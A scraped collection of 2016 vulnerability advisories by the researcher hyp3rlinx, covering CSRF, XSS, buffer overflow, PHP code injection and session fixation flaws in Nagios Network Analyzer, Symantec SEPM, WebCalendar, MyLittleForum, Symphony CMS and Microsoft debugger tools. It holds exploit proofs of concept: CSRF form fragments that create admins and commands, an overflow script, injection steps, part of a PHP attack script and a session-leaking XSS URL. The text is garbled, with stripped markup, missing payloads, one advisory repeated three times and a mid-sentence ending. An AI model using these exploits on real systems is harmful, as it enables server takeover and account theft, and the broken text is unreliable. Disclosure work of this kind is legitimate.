[+] Credits: John Page -hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/NAGIOS-NA-v2.2.1-MULTIPLE-CSRF.txt [+] ISR: ApparitionSec Vendor: === www.nagios.com Product: == Nagios Network Analyzer v2.2.1 Netflow Analysis, Monitoring, and Bandwidth Utilization Software Network Analyzer provides an in-depth look at all network traffic sources and potential security threats allowing system admins to quickly gather high-level information regarding the health of the network as well as highly granular data for complete and thorough network analysis. Vulnerability Type: = Cross Site Request Forgery (CSRF) CVE Reference: == N/A Vulnerability Details: = Nagios NA has multiple CSRF vectors, allowing unauthorized commands to be transmitted from a user that the website trusts if that user is authenticated and visits a malicious webpage or clicks a attacker supplied link. The Nagios system can be compromised as remote attackers can create arbitrary commands e.g. using "wget" to download RCE files onto the system, create arbitrary Admins, delete users, and conduct DOS attacks. Exploit code(s): 1) Create arbitrary commands http://victim-server/nagiosna/index.php/api/system/create_command; method="post"> document.forms[0].submit() 2) Add Admin http://victim-server/nagiosna/index.php/admin/users/create; method="post" accept-charset="utf-8"> document.forms[0].submit() 3) Delete reports (report ID must be known or guessed) http://victim-server/nagiosna/index.php/api/reports/delete; method="post"> document.forms[0].submit() 4) DOS http://victim-server/nagiosna/index.php/api/system/stop; method="post"> //document.forms[0].submit() 5) Delete users (user ID must be known or guessed) http://victim-server/nagiosna/index.php/admin/users/delete; method="post"> document.forms[0].submit() Disclosure Timeline: == Vendor Notification: July 20, 2016 Vendor Acknowledgement: July 21, 2016 Vendor Fix / Release: August 1, 2016 August 8, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: === Medium [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. HYP3RLINX
Microsoft Process Kill Utility "kill.exe" Buffer Overflow
[+] Credits: HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MS-KILL-UTILITY-BUFFER-OVERFLOW.txt [+] ISR: ApparitionSec Vendor: = www.microsoft.com Product: = Microsoft Process Kill Utility "kill.exe" File version: 6.3.9600.17298 The Kill tool (kill.exe), a tool used to terminate a process, part of the WinDbg program. Vulnerability Type: === Buffer Overflow SEH Buffer Overflow @ about 512 bytes Vulnerability Details: = Register dump 'SEH chain of main thread AddressSE handler 001AF688 kernel32.756F489B 001AFBD8 52525252 42424242 *** CORRUPT ENTRY *** 001BF81C 41414141 001BF820 41414141 001BF824 41414141 001BF828 41414141 001BF82C 41414141 001BF830 41414141 001BF834 909006EB Ă« Pointer to next SEH record 001BF838 52525252 SE handler < 001BF83C 90909090 001BF840 90909090 Exploit code(s): Python POC. import subprocess junk="A"*508+"" pgm='c:\\Program Files (x86)\\Windows Kits\\8.1\\Debuggers\\x86\\kill.exe ' subprocess.Popen([pgm, junk], shell=False) Disclosure Timeline: == Vendor Notification: June 24, 2016 Vendor reply: Will not security service July 8, 2016 : Public Disclosure Exploitation Technique: === Local Severity Level: Low [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. HYP3RLINX
Microsoft WinDbg logviewer.exe Buffer Overflow DOS
[+] Credits: HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MS-WINDBG-LOGVIEWER-BUFFER-OVERFLOW.txt [+] ISR: ApparitionSec Vendor: = www.microsoft.com Product: WinDbg logviewer.exe LogViewer (logviewer.exe), a tool that displays the logs created, part of WinDbg application. Vulnerability Type: === Buffer Overflow DOS Vulnerability Details: = Buffer overflow in WinDbg "logviewer.exe" when opening corrupted .lgv files. App crash then Overwrite of MMX registers etc... this utility belongs to Windows Kits/8.1/Debuggers/x86 Read Access Violation / Memory Corruption Win32 API Log Viewer 6.3.9600.17298 Windbg x86 logviewer.exe Log Viewer 3.01 for x86 (5fb8.32fc): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\syswow64\msvcrt.dll - eax=013dad30 ebx=005d ecx=0041 edx= esi=005d2000 edi=013dcd30 eip=754fa048 esp=0009f840 ebp=0009f848 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 msvcrt!memmove+0x1ee: 754fa048 660f6f06movdqa xmm0,xmmword ptr [esi] ds:002b:005d2000= gs 2b fs 53 es 2b ds 2b edi 136cd30 esi 7d2000 ebx 7d edx 0 ecx 41 eax 136ad30 ebp df750 eip 754fa048 cs 23 efl 210206 esp df748 ss 2b dr0 0 dr1 0 dr2 0 dr3 0 dr6 0 dr7 0 di cd30 si 2000 bx 0 dx 0 cx 41 ax ad30 bp f750 ip a048 fl 206 sp f748 bl 0 dl 0 cl 41 al 30 bh 0 dh 0 ch 0 ah ad fpcw 27f fpsw 4020 fptw fopcode 0 fpip 76454c1e fpipsel 23 fpdp 6aec2c fpdpsel 2b st0 -1.00e+000 st1 -1.00e+000 st2 -1.00e+000 st3 9.60e+001 st4 1.08506945252884e-004 st5 -1.00e+000 st6 0.00e+000 st7 0.00e+000 mm0 0:2:2:2 mm1 0:0:2:202 mm2 0:1:1:1 mm3 c000:0:0:0 mm4 e38e:3900:0:0 mm5 0:0:0:0 mm6 0:0:0:0 mm7 0:0:0:0 mxcsr 1fa0 xmm0 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 xmm1 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 xmm2 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 xmm3 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 xmm4 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 xmm5 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 xmm6 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 xmm7 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 iopl 0 of 0 df 0 if 1 tf 0 sf 0 zf 0 af 0 pf 1 cf 0 vip 0 vif 0 xmm0l 4141:4141:4141:4141 xmm1l 4141:4141:4141:4141 xmm2l 4141:4141:4141:4141 xmm3l 4141:4141:4141:4141 xmm4l 4141:4141:4141:4141 xmm5l 4141:4141:4141:4141 xmm6l 4141:4141:4141:4141 xmm7l 4141:4141:4141:4141 xmm0h 4141:4141:4141:4141 xmm1h 4141:4141:4141:4141 xmm2h 4141:4141:4141:4141 xmm3h 4141:4141:4141:4141 xmm4h 4141:4141:4141:4141 xmm5h 4141:4141:4141:4141 xmm6h 4141:4141:4141:4141 xmm7h 4141:4141:4141:4141 xmm0/0 41414141 xmm0/1 41414141 xmm0/2 41414141 xmm0/3 41414141 xmm1/0 41414141 xmm1/1 41414141 xmm1/2 41414141 xmm1/3 41414141 xmm2/0 41414141 xmm2/1 41414141 xmm2/2 41414141 xmm2/3 41414141 xmm3/0 41414141 xmm3/1 41414141 xmm3/2 41414141 xmm3/3 41414141 xmm4/0 41414141 xmm4/1 41414141 xmm4/2 41414141 xmm4/3 41414141 xmm5/0 41414141 xmm5/1 41414141 xmm5/2 41414141 xmm5/3 41414141 xmm6/0 41414141 xmm6/1 41414141 xmm6/2 41414141 xmm6/3 41414141 xmm7/0 41414141 xmm7/1 41414141 xmm7/2 41414141 xmm7/3 41414141 Exploit code(s): === 1) create .lgv file with bunch of 'A's length of 4096 overwrites XXM registers, ECX etc 2) run from command line pipe the file to it to watch it crash and burn. /// Disclosure Timeline: === Vendor Notification: June 23, 2016 Vendor acknowledged: July 1, 2016 Vendor reply: Will not fix (stability issue) July 8, 2016 : Public Disclosure Severity Level: Low [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. HYP3RLINX
WebCalendar v1.2.7 CSRF Protection Bypass
[+] Credits: John Page aka HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt [+] ISR: ApparitionSec Vendor: == www.k5n.us/webcalendar.php Product: == WebCalendar v1.2.7 WebCalendar is a PHP-based calendar application that can be configured as a single-user calendar, a multi-user calendar for groups of users, or as an event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2, Interbase, MS SQL Server, or ODBC is required. WebCalendar can be setup in a variety of ways, such as... A schedule management system for a single person A schedule management system for a group of people, allowing one or more assistants to manage the calendar of another user An events schedule that anyone can view, allowing visitors to submit new events A calendar server that can be viewed with iCalendar-compliant calendar applications like Mozilla Sunbird, Apple iCal or GNOME Evolution or RSS-enabled applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress. Vulnerability Type: == CSRF PROTECTION BYPASS CVE Reference: == N/A Vulnerability Details: = WebCalendar attempts to uses the HTTP Referer to check that requests are originating from same server as we see below. >From WebCalendar "include/functions.php" file on line 6117: function require_valide_referring_url () { global $SERVER_URL; if ( empty( $_SERVER['HTTP_REFERER'] ) ) { // Missing the REFERER value //die_miserable_death ( translate ( 'Invalid referring URL' ) ); // Unfortunately, some version of MSIE do not send this info. return true; } if ( ! preg_match ( "@$SERVER_URL@i", $_SERVER['HTTP_REFERER'] ) ) { // Gotcha. URL of referring page is not the same as our server. // This can be an instance of XSRF. // (This may also happen when more than address is used for your server. // However, you're not supposed to do that with this version of // WebCalendar anyhow...) die_miserable_death ( translate ( 'Invalid referring URL' ) ); } } / However, this can be easily defeated by just not sending a referer. HTML 5 includes a handy tag to omit the referer when making an HTTP request, currently supported in Chrome, Safari, MobileSafari and other WebKit-based browsers. Using this meta tag we send no referrer and the vulnerable application will then happily process our CSRF requests. Exploit code(s): === 1) CSRF Protection Bypass to change Admin password POC. Note: Name of the victim user is required for success. http://localhost/WebCalendar-1.2.7/edit_user_handler.php; method="post"> 2) CSRF Protection Bypass modify access controls under "System Settings" / "Allow public access" http://localhost/WebCalendar-1.2.7/admin.php; method="post" name="prefform"> document.getElementById('CSRF_ACCESS_CTRL').submit() Disclosure Timeline: === Vendor Notification: No replies July 4, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: 6.8 (Medium) CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. HYP3RLINX
WebCalendar v1.2.7 CSRF Protection Bypass
[+] Credits: John Page aka HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt [+] ISR: ApparitionSec Vendor: == www.k5n.us/webcalendar.php Product: == WebCalendar v1.2.7 WebCalendar is a PHP-based calendar application that can be configured as a single-user calendar, a multi-user calendar for groups of users, or as an event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2, Interbase, MS SQL Server, or ODBC is required. WebCalendar can be setup in a variety of ways, such as... A schedule management system for a single person A schedule management system for a group of people, allowing one or more assistants to manage the calendar of another user An events schedule that anyone can view, allowing visitors to submit new events A calendar server that can be viewed with iCalendar-compliant calendar applications like Mozilla Sunbird, Apple iCal or GNOME Evolution or RSS-enabled applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress. Vulnerability Type: == CSRF PROTECTION BYPASS CVE Reference: == N/A Vulnerability Details: = WebCalendar attempts to uses the HTTP Referer to check that requests are originating from same server as we see below. >From WebCalendar "include/functions.php" file on line 6117: function require_valide_referring_url () { global $SERVER_URL; if ( empty( $_SERVER['HTTP_REFERER'] ) ) { // Missing the REFERER value //die_miserable_death ( translate ( 'Invalid referring URL' ) ); // Unfortunately, some version of MSIE do not send this info. return true; } if ( ! preg_match ( "@$SERVER_URL@i", $_SERVER['HTTP_REFERER'] ) ) { // Gotcha. URL of referring page is not the same as our server. // This can be an instance of XSRF. // (This may also happen when more than address is used for your server. // However, you're not supposed to do that with this version of // WebCalendar anyhow...) die_miserable_death ( translate ( 'Invalid referring URL' ) ); } } / However, this can be easily defeated by just not sending a referer. HTML 5 includes a handy tag to omit the referer when making an HTTP request, currently supported in Chrome, Safari, MobileSafari and other WebKit-based browsers. Using this meta tag we send no referrer and the vulnerable application will then happily process our CSRF requests. Exploit code(s): === 1) CSRF Protection Bypass to change Admin password POC. Note: Name of the victim user is required for success. http://localhost/WebCalendar-1.2.7/edit_user_handler.php; method="post"> 2) CSRF Protection Bypass modify access controls under "System Settings" / "Allow public access" http://localhost/WebCalendar-1.2.7/admin.php; method="post" name="prefform"> document.getElementById('CSRF_ACCESS_CTRL').submit() Disclosure Timeline: === Vendor Notification: No replies July 4, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: 6.8 (Medium) CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. HYP3RLINX
WebCalendar v1.2.7 CSRF Protection Bypass
[+] Credits: John Page aka HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt [+] ISR: ApparitionSec Vendor: == www.k5n.us/webcalendar.php Product: == WebCalendar v1.2.7 WebCalendar is a PHP-based calendar application that can be configured as a single-user calendar, a multi-user calendar for groups of users, or as an event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2, Interbase, MS SQL Server, or ODBC is required. WebCalendar can be setup in a variety of ways, such as... A schedule management system for a single person A schedule management system for a group of people, allowing one or more assistants to manage the calendar of another user An events schedule that anyone can view, allowing visitors to submit new events A calendar server that can be viewed with iCalendar-compliant calendar applications like Mozilla Sunbird, Apple iCal or GNOME Evolution or RSS-enabled applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress. Vulnerability Type: == CSRF PROTECTION BYPASS CVE Reference: == N/A Vulnerability Details: = WebCalendar attempts to uses the HTTP Referer to check that requests are originating from same server as we see below. >From WebCalendar "include/functions.php" file on line 6117: function require_valide_referring_url () { global $SERVER_URL; if ( empty( $_SERVER['HTTP_REFERER'] ) ) { // Missing the REFERER value //die_miserable_death ( translate ( 'Invalid referring URL' ) ); // Unfortunately, some version of MSIE do not send this info. return true; } if ( ! preg_match ( "@$SERVER_URL@i", $_SERVER['HTTP_REFERER'] ) ) { // Gotcha. URL of referring page is not the same as our server. // This can be an instance of XSRF. // (This may also happen when more than address is used for your server. // However, you're not supposed to do that with this version of // WebCalendar anyhow...) die_miserable_death ( translate ( 'Invalid referring URL' ) ); } } / However, this can be easily defeated by just not sending a referer. HTML 5 includes a handy tag to omit the referer when making an HTTP request, currently supported in Chrome, Safari, MobileSafari and other WebKit-based browsers. Using this meta tag we send no referrer and the vulnerable application will then happily process our CSRF requests. Exploit code(s): === 1) CSRF Protection Bypass to change Admin password POC. Note: Name of the victim user is required for success. http://localhost/WebCalendar-1.2.7/edit_user_handler.php; method="post"> 2) CSRF Protection Bypass modify access controls under "System Settings" / "Allow public access" http://localhost/WebCalendar-1.2.7/admin.php; method="post" name="prefform"> document.getElementById('CSRF_ACCESS_CTRL').submit() Disclosure Timeline: === Vendor Notification: No replies July 4, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: 6.8 (Medium) CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. HYP3RLINX
WebCalendar v1.2.7 PHP Code Injection
[+] Credits: John Page aka HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-PHP-CODE-INJECTION.txt [+] ISR: ApparitionSec Vendor: == www.k5n.us/webcalendar.php Product: == WebCalendar v1.2.7 WebCalendar is a PHP-based calendar application that can be configured as a single-user calendar, a multi-user calendar for groups of users, or as an event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2, Interbase, MS SQL Server, or ODBC is required. WebCalendar can be setup in a variety of ways, such as... A schedule management system for a single person A schedule management system for a group of people, allowing one or more assistants to manage the calendar of another user An events schedule that anyone can view, allowing visitors to submit new events A calendar server that can be viewed with iCalendar-compliant calendar applications like Mozilla Sunbird, Apple iCal or GNOME Evolution or RSS-enabled applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress. Vulnerability Type: == PHP Code Injection CVE Reference: == N/A Vulnerability Details: = Since WebCalendars install script is not removed after installation as there is no "automatic" removal of it, low privileged users can inject arbitrary PHP code for the "Database Cache" directory value as no input validation exists for this when a user installs the application using the WebCalendar walk thru wizard. If WebCalendars installation script is available as part of a default image, often as a convenience by some hosting providers, this can be used to gain code execution on the target system. The only item that is required is the user must have privileges to authenticate to the MySQL Database and to run the install script. So, users who have install wizard access for the WebCalendar application will now have ability to launch arbitrary system commands on the affected host. One problem we must overcome is WebCalendar filters quotes " so we cannot use code like However, we can defeat this obstacle using the all to forgotten backtick `CMD` operator!. e.g. */?> This results in "settings.php" being injected like... readonly: false user_inc: user.php use_http_auth: false single_user: false # end settings.php */ ?> Exploitation steps(s): = 1) Login to the WebCalendar Installation Wizard. 2) When you get to WebCalendar Installation Wizard Step 2 of the install script. http://localhost/WebCalendar-1.2.7/WebCalendar-1.2.7/install/index.php?action=switch=2 3) Click "Test Settings" button to ensure connection to the Database. 4) Enter below PHP code for the "Database Cache Directory:" input fields value to pop calculator for POC (Windows). */?> 5) Click "Next" button 6) Click "Next" button 7) Click "Save settings" button BOOOM! "settings.php" gets overwritten and injected with our PHP code. If you happen to get following error when clicking "Test Settings" button, "Failure Reason: Database Cache Directory does not exist", just click back button then forward or just "Test settings" button again to try get past the error. Disclosure Timeline: === Vendor Notification: No Replies July 4, 2016 : Public Disclosure Severity Level: 8.0 (High) CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. HYP3RLINX
Symantec SEPM v12.1 Multiple Vulnerabilities
[+] Credits: John Page aka HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SYMANTEC-SEPM-MULTIPLE-VULNS.txt [+] ISR: ApparitionSec Vendor: www.symantec.com Product: === SEPM Symantec Endpoint Protection Manager and client v12.1 SEPM provides a centrally managed solution. It handles security policy enforcement, host integrity checking (Symantec Network Access Control only), and automated remediation over all clients. The policies functionality is the heart of the Symantec software. Clients connect to the server to get the latest policies, security settings, and software updates. Vulnerability Type(s): == Multiple Cross Site Scripting (XSS) Cross Site Request Forgeries (CSRF) Open Redirect CVE Reference(s): = CVE-2016-3652 / XSS CVE-2016-3653 / CSRF CVE-2016-5304 / Open Redirect Vulnerability Details: = The management console for SEPM contains a number of security vulnerabilities that could be used by a lower-privileged user or by an unauthorized user to elevate privilege or gain access to unauthorized information on the management server. Exploitation attempts of these vulnerabilities requires access to the SEP Management console. References: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory=security_advisory==20160628_01 Exploit code(s): === In this case XSS can bypass the "http-only" cookie protection because the SEPM application writes and stores the session ID within various javascript functions used by the application within the DOM thereby exposing them directly to the XSS attack. 1) createModalDialogFromURL 2) createWindowFromURL 3) createWindowFromForm 4) createIEWindowFromForm So all we need to do is alert(createModalDialogFromURL) anyone one of them (functions) an it will leak the session ID essentially throwing the HttpOnly secure cookie protection flag into the garbage. e.g. XSS POC Defeat http-only flag and access PHPSESSID: https://localhost:8445/Reporting/Admin/notificationpopup.php?New=1=CR=alert%28createModalDialogFromURL%29# Open Redirect in external URL .php script: = A reporting URL used to route generated reports externally to any authorized URL is susceptible to an open redirect vulnerability that could have allowed an authorized but less-privileged user to redirect an unsuspecting privileged user to an external URL to attempt further exploitation, e.g. phishing. If a victim clicks on a link supplied by an attacker e.g. https://localhost:8445/Reporting/common/externalurl.php?url=http://hyp3rlinx.altervista.org Cross Site Request Forgery (CSRF): == Multiple Cross Site Request Forgery exists in couple of places within this version of SEPM below is an example of sending scheduled report to an remote attackers email, if current logged in user visits malicious webpage or clicks infected link etc... Symantec Reporting Admin CSRF POC: https://localhost:8445/Reporting/Reports/sr-save.php; method="POST" /> document.getElementById('PWN').submit() Disclosure Timeline: Vendor Notification: Febuary 11, 2016 Vendor Acknowledges Report: Febuary 12, 2016 Vendor Releases Fix: June 28, 2016 June 29, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level(s): Cross Site Scripting Medium v2 6.8 AV:A/AC:M/Au:S/C:C/I:C/A:N v3 6.7 AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N Cross Site Request Forgery High v2 7.0 AV:A/AC:M/Au:M/C:C/I:C/A:C v3 7.1 AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H Open Redirect Medium v2 4.1 AV:A/AC:L/Au:S/C:P/I:P/A:N v3 4.1 AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
MyLittleForum v2.3.5 PHP Command Injection
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MYLITTLEFORUM-PHP-CMD-EXECUTION.txt [+] ISR: APPARITIONSEC Vendor: = mylittleforum.net Download: github.com/ilosuna/mylittleforum/releases/tag/v2.3.5 Product: === MyLittleForum 2.3.5 my little forum is a simple PHP and MySQL based internet forum that displays the messages in classical threaded view (tree structure). The main claim of this web forum is simplicity. Furthermore it should be easy to install and run on a standard server configuration with PHP and MySQL. Vulnerability Type: === PHP Command Execution CVE Reference: == N/A Vulnerability Details: = When setting up mylittleforum CMS users will have to walk thru an installation script and provide details for the application like the forums email address, name, admin email, admin password, database name etc... However, no input validation / checks exists for that installation script. Low privileged users can then supply arbitrary PHP code for the Database Name. The PHP command values will get written to the config/db_settings.php file and processed by the application. Since we supply an invalid Database Name a MySQL error will be thrown but the injected PHP payload will also be executed on the host system. If the CMS is installed by low privileged user and that user has basic MySQL database authorization to run the install for the CMS it can result in a privilege escalation, remote command execution and complete takeover of the host server. The /config/db_settings.php is protected by .htaccess file but we can write directly to "db_settings.php" file and execute code directly from /install/index.php file bypassing any access control provided by the .htaccess file or we just delete it by adding call to PHP function @unlink('.htaccess') to our injected PHP payload. 1) Browse to http://localhost/mylittleforum-2.3.5/install/index.php 2) For Database Name input field enter the below PHP code for POC. ';?>news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin etc... Exploit code(s): === 1) Download and unpack mylittleforum-2.3.5 upload to web server (Linux), chmod -R 777 etc... 2) Run below PHP script from Command line from remote work station 3) BOOM we can now read Linux "/etc/passwd" file on remote server ,,,\r\n"; echo "= by hyp3rlinx ===\r\n"; exit(); } $port=80; #Default port $victim=$argv[1]; #IP $user=$argv[2]; #MySQL username $pwd=$argv[3]; #MySQL password $root_dir=$argv[4]; #/mylittleforum-2.3.5 $uri="/install/index.php"; #PHP CMD inject entry point $s = fsockopen($victim, $port, $errno, $errstr, 10); if(!$s){echo "Cant connect to the server!"; exit();} $CMD_INJECTTION="forum_name=PWN". "_address=http://$victim/$root_dir/;. "_email=x...@x.com". "_name=$user". "_email=x...@x.com". "_pw=$pwd". "_pw_conf=$pwd". "=localhost". "=';?> Disclosure Timeline: = Vendor Notification: No Reply June 27, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: === (High) 8.7 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
Symphony CMS v2.6.7 Session Fixation
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SYMPHONY-CMS-SESSION-FIXATION.txt [+] ISR: APPARITIONSEC Vendor: www.getsymphony.com Product: == Symphony CMS v2.6.7 Download: http://www.getsymphony.com/download/ Symphony is a XSLT-powered open source content management system. Vulnerability Type: === Session Fixation CVE Reference: == CVE-2016-4309 Vulnerability Details: = Symphony CMS is prone to "Session Fixation" allowing attackers to preset a users PHPSESSID "Session Identifier". If the application is deployed using an insecure setup with PHP.INI "session.use_only_cookies" not enabled, attackers can then send victims a link to the vulnerable application with the "PHPSESSID" already initialized as Symphony does not use or call "session_regenerate_id()" upon successful user authentication. Note: as per php.net/manual/en/session.configuration.php "session.use_only_cookies=1" is default since PHP 4.3.0. e.g. "http://localhost/symphony/?PHPSESSID=APPARITION666;. As Symphonys Session ID is not regenerated it can result in arbitrary Session ID being 'Fixated' to a user, if that user authenticates using this attacker supplied session fixated link, the attacker can now access the affected application from a different Computer/Browser and have the same level of access to that of the victim. Default Cookie lifetime for Symphony CMS is up to two weeks. Reproduction steps: = Edit PHP.INI and change following settings to 'session.use_only_cookies=0' if applicable, as POC test. 1) Telnet localhost 80 2) make HTTP request with a prefixed PHPSESSID GET /symphony-2.6.7/symphony/?PHPSESSID=PWN3D666 HTTP/1.1 Host: localhost Connection: close 3) Hit enter twice HTTP/1.1 200 OK Date: Mon, 16 May 2016 02:06:47 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1l PHP/5.6.8 X-Powered-By: PHP/5.6.8 Set-Cookie: PHPSESSID=PWNED666; expires=Mon, 30-May-2016 02:06:48 GMT; Max-Age=1209600; path=/symphony-2.6.7; httponly Content-Length: 1501 Connection: close Content-Type: text/html; charset=UTF-8 Exploit code(s): === 1) http://localhost/symphony-2.6.7/symphony/publish/articles/?PHPSESSID=hyp3rlinx 2) http://localhost/symphony-2.6.7/symphony/?PHPSESSID=APPARITION Disclosure Timeline: = Vendor Notification: May 3, 2016 Vendor Release Fix: May 23, 2016 June 20, 2016 : Public Disclosure. Exploitation Method: Remote Severity Level: 6.8 (Medium) CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N Description: == Request Method(s): [+] GET / POST Vulnerable Product: [+] Symphony CMS 2.6.7 Vulnerable Parameter(s): [+] 'PHPSESSID' === [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use 